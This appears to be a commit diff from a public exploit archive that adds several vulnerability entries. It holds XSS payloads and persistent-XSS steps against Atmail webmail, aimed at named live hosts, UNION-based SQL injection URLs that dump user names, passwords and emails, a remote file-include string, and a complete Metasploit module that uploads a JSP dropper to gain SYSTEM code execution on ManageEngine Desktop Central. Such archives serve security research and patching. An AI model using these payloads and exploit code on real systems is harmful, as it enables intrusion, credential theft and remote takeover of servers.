||||
define('TEXT_DISPLAY_NUMBER_OF_PRODUCTS_NEW', 'Displaying <strong>%d</strong> to <strong>%d</strong> (of <strong>%d</strong> new products)');
|
||||
define('TEXT_DISPLAY_NUMBER_OF_SPECIALS', 'Displaying <strong>%d</strong> to <strong>%d</strong> (of <strong>%d</strong> specials)');
|
||||
|
||||
define('PREVNEXT_TITLE_FIRST_PAGE', 'First Page');
|
||||
define('PREVNEXT_TITLE_PREVIOUS_PAGE', 'Previous Page');
|
||||
define('PREVNEXT_TITLE_NEXT_PAGE', 'Next Page');
|
||||
define('PREVNEXT_TITLE_LAST_PAGE', 'Last Page');
|
||||
define('PREVNEXT_TITLE_PAGE_NO', 'Page %d');
|
||||
define('PREVNEXT_TITLE_PREV_SET_OF_NO_PAGE', 'Previous Set of %d Pages');
|
||||
define('PREVNEXT_TITLE_NEXT_SET_OF_NO_PAGE', 'Next Set of %d Pages');
|
||||
define('PREVNEXT_BUTTON_FIRST', '<<FIRST');
|
||||
define('PREVNEXT_BUTTON_PREV', '[<< Prev]');
|
||||
define('PREVNEXT_BUTTON_NEXT', '[Next >>]');
|
||||
define('PREVNEXT_BUTTON_LAST', 'LAST>>');
|
||||
|
||||
define('IMAGE_BUTTON_ADD_ADDRESS', 'Add Address');
|
||||
define('IMAGE_BUTTON_ADDRESS_BOOK', 'Address Book');
|
||||
define('IMAGE_BUTTON_BACK', 'Back');
|
||||
define('IMAGE_BUTTON_BUY_NOW', 'Buy Now');
|
||||
define('IMAGE_BUTTON_CHANGE_ADDRESS', 'Change Address');
|
||||
define('IMAGE_BUTTON_CHECKOUT', 'Checkout');
|
||||
define('IMAGE_BUTTON_CONFIRM_ORDER', 'Confirm Order');
|
||||
define('IMAGE_BUTTON_CONTINUE', 'Continue');
|
||||
define('IMAGE_BUTTON_CONTINUE_SHOPPING', 'Continue Shopping');
|
||||
define('IMAGE_BUTTON_DELETE', 'Delete');
|
||||
define('IMAGE_BUTTON_EDIT_ACCOUNT', 'Edit Account');
|
||||
define('IMAGE_BUTTON_HISTORY', 'Order History');
|
||||
define('IMAGE_BUTTON_LOGIN', 'Sign In');
|
||||
define('IMAGE_BUTTON_IN_CART', 'Add to Cart');
|
||||
define('IMAGE_BUTTON_NOTIFICATIONS', 'Notifications');
|
||||
define('IMAGE_BUTTON_QUICK_FIND', 'Quick Find');
|
||||
define('IMAGE_BUTTON_REMOVE_NOTIFICATIONS', 'Remove Notifications');
|
||||
define('IMAGE_BUTTON_REVIEWS', 'Reviews');
|
||||
define('IMAGE_BUTTON_SEARCH', 'Search');
|
||||
define('IMAGE_BUTTON_SHIPPING_OPTIONS', 'Shipping Options');
|
||||
define('IMAGE_BUTTON_TELL_A_FRIEND', 'Tell a Friend');
|
||||
define('IMAGE_BUTTON_UPDATE', 'Update');
|
||||
define('IMAGE_BUTTON_UPDATE_CART', 'Update Cart');
|
||||
define('IMAGE_BUTTON_WRITE_REVIEW', 'Write Review');
|
||||
|
||||
define('SMALL_IMAGE_BUTTON_DELETE', 'Delete');
|
||||
define('SMALL_IMAGE_BUTTON_EDIT', 'Edit');
|
||||
define('SMALL_IMAGE_BUTTON_VIEW', 'View');
|
||||
|
||||
define('ICON_ARROW_RIGHT', 'more');
|
||||
define('ICON_CART', 'In Cart');
|
||||
define('ICON_ERROR', 'Error');
|
||||
define('ICON_SUCCESS', 'Success');
|
||||
define('ICON_WARNING', 'Warning');
|
||||
|
||||
define('TEXT_GREETING_PERSONAL', 'Welcome back <span class="greetUser">%s!</span> Would you like to see which <a href="%s"><u>new products</u></a> are available to purchase?');
|
||||
define('TEXT_GREETING_PERSONAL_RELOGON', '<small>If you are not %s, please <a href="%s"><u>log yourself in</u></a> with your account information.</small>');
|
||||
define('TEXT_GREETING_GUEST', 'Welcome <span class="greetUser">Guest!</span> Would you like to <a href="%s"><u>log yourself in</u></a>? Or would you prefer to <a href="%s"><u>create an account</u></a>?');
|
||||
|
||||
define('TEXT_SORT_PRODUCTS', 'Sort products ');
|
||||
define('TEXT_DESCENDINGLY', 'descendingly');
|
||||
define('TEXT_ASCENDINGLY', 'ascendingly');
|
||||
define('TEXT_BY', ' by ');
|
||||
|
||||
define('TEXT_REVIEW_BY', 'by %s');
|
||||
define('TEXT_REVIEW_WORD_COUNT', '%s words');
|
||||
define('TEXT_REVIEW_RATING', 'Rating: %s [%s]');
|
||||
define('TEXT_REVIEW_DATE_ADDED', 'Date Added: %s');
|
||||
define('TEXT_NO_REVIEWS', 'There are currently no product reviews.');
|
||||
|
||||
define('TEXT_NO_NEW_PRODUCTS', 'There are currently no products.');
|
||||
|
||||
define('TEXT_UNKNOWN_TAX_RATE', 'Unknown tax rate');
|
||||
|
||||
define('TEXT_REQUIRED', '<span class="errorText">Required</span>');
|
||||
|
||||
define('ERROR_TEP_MAIL', '<font face="Verdana, Arial" size="2" color="#ff0000"><strong><small>TEP ERROR:</small> Cannot send the email through the specified SMTP server. Please check your php.ini setting and correct the SMTP server if necessary.</strong></font>');
|
||||
|
||||
define('TEXT_CCVAL_ERROR_INVALID_DATE', 'The expiry date entered for the credit card is invalid. Please check the date and try again.');
|
||||
define('TEXT_CCVAL_ERROR_INVALID_NUMBER', 'The credit card number entered is invalid. Please check the number and try again.');
|
||||
define('TEXT_CCVAL_ERROR_UNKNOWN_CARD', 'The first four digits of the number entered are: %s. If that number is correct, we do not accept that type of credit card. If it is wrong, please try again.');
|
||||
|
||||
define('FOOTER_TEXT_BODY', 'Copyright © ' . date('Y') . ' <a href="' . tep_href_link(FILENAME_DEFAULT) . '">' . STORE_NAME . '</a><br />Powered by <a href="http://www.oscommerce.com" target="_blank">osCommerce</a>');
|
||||
?>
|
||||
" />
|
||||
<input type="submit" value="Go" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
80
platforms/php/webapps/34585.txt
Executable file
80
platforms/php/webapps/34585.txt
Executable file
|
@ -0,0 +1,80 @@
|
|||
#Title: Atmail Webmail =>7.2 - Multiple XSS & FPD
|
||||
#Date: 01.27.2014
|
||||
#Vendor: atmail.com
|
||||
#Version: =>7.2 (Latest ATM), tested also on 7.1.1
|
||||
#Authors: Smash_ & Brag / smash[at]devilteam.pl
|
||||
#PoC: poczta.pl / demo.atmail.com
|
||||
|
||||
1. Cross Site Scripting
|
||||
|
||||
a) GET - viewmessageTabNumber
|
||||
|
||||
Request:
|
||||
host/mail/index.php/mail/composemessage/index/viewmessageTabNumber/3"><h1>XSS<!--
|
||||
|
||||
Injection point (line 16):
|
||||
<input type="hidden" name="tabId" value="viewmessageTab3"><h1>XSS<!--
|
||||
|
||||
PoC:
|
||||
https://www.poczta.pl/mail/index.php/mail/composemessage/index/viewmessageTabNumber/3"><h1>XSS<!--
|
||||
|
||||
b) POST - filter
|
||||
|
||||
|
||||
POST /mail/index.php/mail/mail/listfoldermessages/searching/true/selectFolder/INBOX.666/resultContext/searchResultsTab1 HTTP/1.1
|
||||
Host: www.poczta.pl
|
||||
searchQuery=&goBack=6&from=&to=&subject=&body=&filter=<script>alert(666)</script>
|
||||
|
||||
Alert will appear; injection point:
|
||||
<div id=\"noMessageDisplay\" style=\"margin:10px;\">\n\t\t\t\tFound no messages matching <script>alert(666) (...)
|
||||
|
||||
c) POST - Search Results Tab
|
||||
|
||||
Request:
|
||||
POST /mail/index.php/mail/mail/listfoldermessages/searching/true/selectFolder/INBOX/resultContext/searchResultsTab1"%20whats="up"%20bad=" HTTP/1.1
|
||||
Host: http://www.poczta.pl
|
||||
|
||||
Injection point:
|
||||
<input type=\"hidden\" name=\"resultContext\" id=\"resultContext\" value=\"searchResultsTab1\" whats=\"up\" bad=\"\" \/>
|
||||
|
||||
d) POST - page
|
||||
|
||||
Request:
|
||||
POST /mail/index.php/mail/mail/listfoldermessages/selectFolder/INBOX/page/2"%20xss="true"%20bad=" HTTP/1.1
|
||||
Host: www.poczta.pl
|
||||
|
||||
Injection point:
|
||||
<input type=\"hidden\" name=\"pageNumber\" id=\"pageNumber\" value=\"2\" xss=\"true\" bad=\"\" \/>
|
||||
|
||||
|
||||
2. Full Path Disclosure
|
||||
|
||||
Request (GET):
|
||||
demo.atmail.com/mail/index.php/mail/mail/listfoldermessages/
|
||||
|
||||
Response:
|
||||
An error occurred
|
||||
script 'mail/listfoldermessages.phtml' not found in path (/usr/local/atmail/webmail/application/modules/mail/views/scripts/)
|
||||
|
||||
3. Persistent XSS - Theme Color
|
||||
|
||||
Request:
|
||||
GET /mail/index.php/mail/settings/webmailsave?fields%5BcssColorTheme%5D=purple"%20onload=alert(666)%20bad="&save=1 HTTP/1.1
|
||||
Host: www.poczta.pl
|
||||
|
||||
Now, whenever someone will login alert will appear.
|
||||
Injection point:
|
||||
<body class="leaderboard-ad-off footer-ad-off '"XSS fresh blue" onload=alert(666) bad="" id="calon">
|
||||
|
||||
4. Persistent XSS - Forward a Message
|
||||
|
||||
First, compose your message and attach an image. Image name should consist
|
||||
JS code, for example: "><img src=x onerror=prompt(1)>.
|
||||
|
||||
Send message to a victim, whenever someone will 'Forward' the message,
|
||||
JS will be executed:
|
||||
|
||||
<a class=\"attach-btn\" href=\"#\" onClick=\"removeAttachment('bobs.\\\"><img src=x onerror=prompt(1)> (...)
|
||||
|
||||
P.S - Login and password are sent as plaintext.
|
||||
... which is bad.
|
12
platforms/php/webapps/34596.txt
Executable file
12
platforms/php/webapps/34596.txt
Executable file
|
@ -0,0 +1,12 @@
|
|||
source: http://www.securityfocus.com/bid/42967/info
|
||||
|
||||
Pligg CMS is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
Pligg CMS 1.0.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
The following example URIs are available:
|
||||
|
||||
http://www.example.com//pliggcms_1_0_4/login.php?email=sql'injection&processlogin=3&return=%2fpliggcms_1_0_4%2f
|
||||
http://www.example.com/pliggcms_1_0_4/user.php?category=%22%20onmouseover%3dprompt%28938687%29%20bad%3d%22&id=&keyword=Search..&login=&module=&page=&search=&view=search
|
7
platforms/php/webapps/34597.txt
Executable file
7
platforms/php/webapps/34597.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/42973/info
|
||||
|
||||
Datetopia Buy Dating Site is prone to a cross-site scripting vulnerability because the it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
http://www.example.com/profile.php?profile_id=568&s_r="><script>alert(document.cookie);</script>
|
9
platforms/php/webapps/34598.txt
Executable file
9
platforms/php/webapps/34598.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/42974/info
|
||||
|
||||
SZNews is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
|
||||
|
||||
SZNews 2.7 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/path/printnews.php3?id=[shell.txt?]
|
14
platforms/php/webapps/34599.txt
Executable file
14
platforms/php/webapps/34599.txt
Executable file
|
@ -0,0 +1,14 @@
|
|||
source: http://www.securityfocus.com/bid/42975/info
|
||||
|
||||
HotelBook is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/hotel.php?hotel_id=1'+UNION+SELECT+0,0,0,0,0,CONCAT_WS(0x3a3a3a3a3a,user_name,password,email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+user/*
|
||||
http://www.example.com/details.php?hotel_id=1'+UNION+SELECT+0,0,0,0,0,CONCAT_WS(0x3a3a,user_name,password,email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+user/*
|
||||
http://www.example.com/roomtypes.php?hotel_id=1'+UNION+SELECT+0,0,CONCAT_WS(0x3a3a3a3a3a,user_name,password,email),0,0,0,0,0,0,0,0+FROM+user/*
|
||||
http://www.example.com/photos.php?hotel_id=1' << SQL >>
|
||||
http://www.example.com/map.php?hotel_id=1' << SQL >>
|
||||
http://www.example.com/weather.php?hotel_id=1' << SQL >>
|
||||
http://www.example.com/reviews.php?hotel_id=1' << SQL >>
|
||||
http://www.example.com/book.php?hotel_id=1' << SQL >>
|
7
platforms/php/webapps/34600.txt
Executable file
7
platforms/php/webapps/34600.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/42976/info
|
||||
|
||||
Datetopia Match Agency BiZ is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
http://www.example.com/edit_profile.php?important="><script>alert(document.cookie);</script>
|
7
platforms/php/webapps/34601.txt
Executable file
7
platforms/php/webapps/34601.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/42976/info
|
||||
|
||||
Datetopia Match Agency BiZ is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
http://www.example.com/report.php?pid="><script>alert(document.cookie);</script>
|
11
platforms/windows/dos/34602.html
Executable file
11
platforms/windows/dos/34602.html
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/42993/info
|
||||
|
||||
Microsoft Internet Explorer is prone to a cross-domain information-disclosure vulnerability because the application fails to enforce the same-origin policy.
|
||||
|
||||
An attacker can exploit this issue by enticing an unsuspecting user into viewing a page containing malicious content.
|
||||
|
||||
Successful exploits will allow attackers to bypass the same-origin policy and obtain potentially sensitive information; other attacks are possible.
|
||||
|
||||
This issue affects Internet Explorer 6, 7, and 8.
|
||||
|
||||
<html> <head> <style> @import url("http://www.example.com/hi_heige"); </style> <script> function loaded() { alert(document.styleSheets(0).imports(0).cssText); } </script> </head> <body onload="loaded()"> </body> </html>
|
169
platforms/windows/remote/34594.rb
Executable file
169
platforms/windows/remote/34594.rb
Executable file
|
@ -0,0 +1,169 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'ManageEngine Desktop Central StatusUpdate Arbitrary File Upload',
|
||||
'Description' => %q{
|
||||
This module exploits an arbitrary file upload vulnerability in ManageEngine DesktopCentral
|
||||
v7 to v9 build 90054 (including the MSP versions).
|
||||
A malicious user can upload a JSP file into the web root without authentication, leading to
|
||||
arbitrary code execution as SYSTEM. Some early builds of version 7 are not exploitable as
|
||||
they do not ship with a bundled Java compiler.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2014-5005'],
|
||||
['OSVDB', '110643'],
|
||||
['URL', 'http://seclists.org/fulldisclosure/2014/Aug/88'],
|
||||
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/me_dc9_file_upload.txt']
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Desktop Central v7 to v9 build 90054 / Windows', {} ]
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Aug 31 2014'
|
||||
))
|
||||
|
||||
register_options([Opt::RPORT(8020)], self.class)
|
||||
end
|
||||
|
||||
|
||||
# Test for Desktop Central
|
||||
def check
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri("configurations.do"),
|
||||
'method' => 'GET'
|
||||
})
|
||||
|
||||
if res && res.code == 200
|
||||
build = nil
|
||||
|
||||
if res.body.to_s =~ /ManageEngine Desktop Central 7/ ||
|
||||
res.body.to_s =~ /ManageEngine Desktop Central MSP 7/ # DC v7
|
||||
|
||||
print_status("#{peer} - Detected Desktop Central v7")
|
||||
elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ ||
|
||||
res.body.to_s =~ /ManageEngine Desktop Central MSP 8/
|
||||
|
||||
if res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v8 (later versions)
|
||||
build = $1
|
||||
print_status("#{peer} - Detected Desktop Central v8 #{build}")
|
||||
else # DC v8 (earlier versions)
|
||||
print_status("#{peer} - Detected Desktop Central v8")
|
||||
end
|
||||
elsif res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v9 (and higher?)
|
||||
build = $1
|
||||
end
|
||||
|
||||
if build.nil?
|
||||
return Exploit::CheckCode::Unknown
|
||||
elsif Gem::Version.new(build) < Gem::Version.new("90055")
|
||||
return Exploit::CheckCode::Appears
|
||||
else
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("#{peer} - Uploading JSP to execute the payload")
|
||||
|
||||
exe = payload.encoded_exe
|
||||
exe_filename = rand_text_alpha_lower(8) + ".exe"
|
||||
|
||||
jsp_payload = jsp_drop_and_execute(exe, exe_filename)
|
||||
jsp_name = rand_text_alpha_lower(8) + ".jsp"
|
||||
|
||||
send_request_cgi({
|
||||
'uri' => normalize_uri('statusUpdate'),
|
||||
'method' => 'POST',
|
||||
'data' => jsp_payload,
|
||||
'ctype' => 'text/html',
|
||||
'vars_get' => {
|
||||
'actionToCall' => 'LFU',
|
||||
'configDataID' => '1',
|
||||
'customerId' => rand_text_numeric(4),
|
||||
'fileName' => '../' * 6 << jsp_name
|
||||
}
|
||||
})
|
||||
# We could check for HTTP 200 and a "success" string.
|
||||
# However only some later v8 and v9 versions return this; and we don't really care
|
||||
# and do a GET to the file we just uploaded anyway.
|
||||
|
||||
register_files_for_cleanup(exe_filename)
|
||||
register_files_for_cleanup("..\\webapps\\DesktopCentral\\#{jsp_name}")
|
||||
|
||||
print_status("#{peer} - Executing payload")
|
||||
send_request_cgi(
|
||||
{
|
||||
'uri' => normalize_uri(jsp_name),
|
||||
'method' => 'GET'
|
||||
})
|
||||
end
|
||||
|
||||
|
||||
def jsp_drop_bin(bin_data, output_file)
|
||||
jspraw = %Q|<%@ page import="java.io.*" %>\n|
|
||||
jspraw << %Q|<%\n|
|
||||
jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|
|
||||
|
||||
jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|
|
||||
|
||||
jspraw << %Q|int numbytes = data.length();\n|
|
||||
|
||||
jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
|
||||
jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
|
||||
jspraw << %Q|{\n|
|
||||
jspraw << %Q| char char1 = (char) data.charAt(counter);\n|
|
||||
jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n|
|
||||
jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n|
|
||||
jspraw << %Q| comb <<= 4;\n|
|
||||
jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n|
|
||||
jspraw << %Q| bytes[counter/2] = (byte)comb;\n|
|
||||
jspraw << %Q|}\n|
|
||||
|
||||
jspraw << %Q|outputstream.write(bytes);\n|
|
||||
jspraw << %Q|outputstream.close();\n|
|
||||
jspraw << %Q|%>\n|
|
||||
|
||||
jspraw
|
||||
end
|
||||
|
||||
|
||||
def jsp_execute_command(command)
|
||||
jspraw = %Q|\n|
|
||||
jspraw << %Q|<%\n|
|
||||
jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n|
|
||||
jspraw << %Q|%>\n|
|
||||
|
||||
jspraw
|
||||
end
|
||||
|
||||
|
||||
def jsp_drop_and_execute(bin_data, output_file)
|
||||
jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file)
|
||||
end
|
||||
end
|
Loading…
Add table
Reference in a new issue